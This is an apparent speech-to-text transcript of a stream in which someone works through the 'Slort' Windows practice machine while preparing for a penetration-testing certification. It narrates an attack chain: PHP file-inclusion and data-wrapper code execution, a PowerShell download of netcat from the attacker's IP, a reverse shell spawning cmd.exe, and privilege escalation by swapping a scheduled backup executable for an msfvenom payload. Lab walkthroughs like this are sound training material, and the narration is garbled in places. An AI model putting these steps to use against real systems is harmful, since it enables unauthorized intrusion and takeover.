Hi everyone, I'm alive. I'm not sure. Um, so I'm going to check it at Twitch. There are a lot of time without connect to my channel. Um, it's something new for me again. Um, Performance streaming after maybe a month without connect to this platform because yeah, it's alive. I'm was inside of OCCP certification labs and I can't wreck the machines and the um, the content inside of the certification because it's privated. It's not allowed. Okay, I'm here again. Um, Tonight we are going to perform a new Windows machine on my channel. Its name is Slort. It's an intermediate level, but I think that not so difficult. Um, we can create a new folder, start and Kadir with the penetration test and privilege escalation. Yeah, this is the IP. The name is Slort. And inside of Slort, I can create a new folders with the name of nmap, scripts, data, and exploits. Inside of nmap, um, I can execute nmap tool. It's a custom bash script that perform by itself the recognition, and I can execute to the fast TCP start in order to start with the penetration test. So like in other windows there are many open ports, so I don't know why, but when I watch the HTTP port using 1818 or 18 port, I usually start to this web um, server because usually there are a lot of work inside. So yes, it's alive. We know that this is a SAMP that contains Apache, MariaDB, PHP, and Perl. So usually you can try to access to first robots.txt. It seems that it's not alive. Of course, PHP myadmin. It's the security, news and security. It's not allowed outside of the target machine by configuration. So the most quickly start is perform a dir search during the nmap on this machine. So let me http so I'm going to stop it because I want to continue with this directory and I don't want to wait to execute all the dictionary and launch again the dir search with the content site. Yep, so it's working. and see you the directories and folders inside of this service. So here it seems that it's necessary nmap minus sc minus n minus sv minus ports, this one, verbose mode, the IP of course, minus on target nmap. Yes, so look nice. Oh yes, I forgive the same parameter, and it's minus pn. Yeah, right now. So inside of site, yeah, we can. The first one is when you watch this kind of parameters in PHP, there are possibilities about PHP wrapper or vulnerabilities at the URL management. So the first one is review the robots.txt, for example, and it's not found robots. Yeah. So this is the main. If we try to, for example, use here index, try to load whatever inside of include the path of peer. So it seems that the source code contain an include value. For example, contact.php. Yeah, load the content web page. So at this point, we can find a wrapper that allows you, for example, obtain the content using base 64 encode. So how? Like this parameter, we can use this one. So inside of page is this one. Yeah. So include the index PHP source code at base64 encoding. So this is dangerous because could contain important data at source code of PHP. For example, we can do curl like this. Yeah, and if we concat this with base 64 minus d, we can review the vulnerable source code that is this one. When you say page, include the value that you want. So you can try to use another kinds of wrappers. For example, one of them allows you perform remote code execution like this one. Inside of page, you can do this one, data, explain, and bypass a PHP info. Yeah, but this is only a test because you can do this one. For example, system, and inside of system, you can perform who am I? Yeah, and it's a Rupert, like my little sister, Ruperta. Yes, and so we can perform who am I slash all, and for example, like this, we can review better with better. Yeah, it's medium mandatory level, so not include many privilege um, with authority, but it's enough for access. So the first one is at my local machine. So this is the nmap finish. So this is the HTTP that we are reviewing at this moment. Clear. Okay, at this point I need locate the netcat.exec on my operative system, and I'm going to scripts cp this one here. So perfect python minus m http server. We launch an http server at port 80, and we can execute from here PowerShell.exe and wget an http to my attacker IP. That my attacker IP is if config is this one at port 80, and netcat.exec is the binary, and the out file maybe at the same directory, netcat.exec. Yeah, like this. It seems that it don't work properly. Out file PowerShell.exe wget http netcat.exec. So again, Control X. Who am I? All is right. Yes. So PowerShell.exe. Who am I? Okay. Perfect. So wget http http to my attacker IP, that 192.168. This is 47.149 netcat.exe. So the IP is bad. It's 49.147. Yeah, right now it's working fine. So it seems that by default it's save the file at the same directory. So dear netcat.exec, yeah, is here. Right now we can perform an execution to my attacker machine with NV and 192, 168, 49 and 147. Yeah, at port 80, and I want to span a cmd.exe. So at this point I need clear and listen netcat at port 80. Perfect. And execute it again. So this. cmd.exec. This is my IP. Yeah, don't work. So maybe it's possible. Move. Move in Windows is move netcat.exe to see users public netcat.exe like this. Maybe I can execute this. There. See users public. Is this like it? So I don't know why. Oh, don't work using this directory. This is samp site htdoc site. Maybe like this. netcat.exe. This is a good path. Site. Concat about. It seems that the netcat.exe, yeah, perfect, is here. So what is the problem? Minus nv on my attacker IP is this one, and my port minus e cmd.exe. In Windows you should do this. So why? Yeah, it seems that I performed this one before. So what is the problem? Netcat cmd.exec. Maybe the binary dislike. This binary, it's a bad version of netcat, maybe. So locate netcat.exec. So window resource binary streamings. Where is it? maybe add sudo update db fonts kali. Boom, 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 boom. Okay, I remember that this is inside of home, Kali, bootcamp OCCP, day 28, Slort machine, nmap, netcat.exec here. So at this point, Python 3 at port, yes. So PowerShell.exec, wget and HTTP 192, 168, 47, no, 49, and 147. Yeah, netcat.exec minus out file netcat.exec. I think that the out file is disliked at this moment. Yeah, but it's completely downloaded. So um, um, there, Control F, netcat.exec. But it's not here. If I perform netcat.exec, it say it's here. So what is the problem? Maybe minus out file cw windows temp netcat.exec. Yep. Netcat is here. Control X. There. No stamp. No. Windows app data. App data netcat.exec. Maybe, I don't know. It's downloaded inside of there. No. So maybe like this. Is netcat.exec. Right now. Oh yes, I know what is the problem. The port. Yes. 8080. I'm going to use the same port that in the web server. Yeah. Who am I? Rupert. Who am I? All. This is all. So, the privilege escalation of this machine, the first one use a win piece in order to review the service, but uh, inside of the root folder we found a backup, and it's a unknown directory, so we need to review it. uh, Type backup.txt, type backup.txt. Don't show you important information. It's only the backups that perform. So the info, type info.txt, say you run every 5 minutes this file and execute this backup. So we can review that I know eclcls.exe, yeah, ec exe, this folder, and acls.exe, the tftp.exe file. So authenticated users, built-in authenticated user can modify built-in users has full control over this file. So we can create with msf venom a malicious payload, for example exe, and here tftp.exe, tftp.exe, yeah, and 49147, and the port 8080. As it's working, the payload is for x64 system info. This is a Windows 10 x64 with all patched, don't has kernel vulnerabilities or knowing vulnerabilities. So we can stop here this one, and it's x64 based. So here at port 40 Python 3 at port 8080, I can upload with PowerShell again .exe wget http at 192.168.49 and 147, the tftp.exe file to out file, tftp.exe new. Yes, because the port is 8080. Yeah. Like this is tftp.exe, and the out file is tftp.exe new. we found an error because this is inside of scripts and this is inside of nmap. So we need to go to scripts and launch again the HTTP server. So it's the same command. We can copy paste and execute it. So right now we have the both, so we can move this one to backup, move the new file to TFTP like this. So right now I can listen netcat with port 8080. The others is already in use. Right now it's free, and I hope that in less than 5 minutes we can obtain a reversal with the root privilege, the port 8080. So what is my next machine? Maybe fail. So I'm going to review my Rex machines fail during the wait. Fail is payday. I remember that too. Payday 2. Payday Linux. TWEGG. No, this one TW. No, so maybe I can reg it tonight too. So it's easy. And metahead, I think that is rigged. Yes. So this is my personal blog. I'm looking for the machines of today. Fail. Yeah, I just reg it. Payday is reg it too. Miet head. So maybe Ctrl F. Miet. Oh, it's misspellings. Is mid here. Okay, and the other is TWG. It's just reg it. So all of others machine of today is just requiem, is just reg it, and on my personal blog of Road to OCCP. Of course, at Twitch and YouTube platforms. So yes, finally, who am I? who am I? All. Yes, we are administrator of the system, so we can go to the C users, um, obtain the flags. The first one is inside of Rupert, cd desktop, um, yes, type local.txt, and the other one is inside of administrator, um, inside of desktop, and type proof.txt. Yeah, config, who am I? Yeah, this is the proof for my exam. So this is all for this machine. If you know what is the vulnerable service, it could be faster, but you need review and try harder in order to find the vulnerability. So this is all, and I hope see you as soon as possible. Bye bye.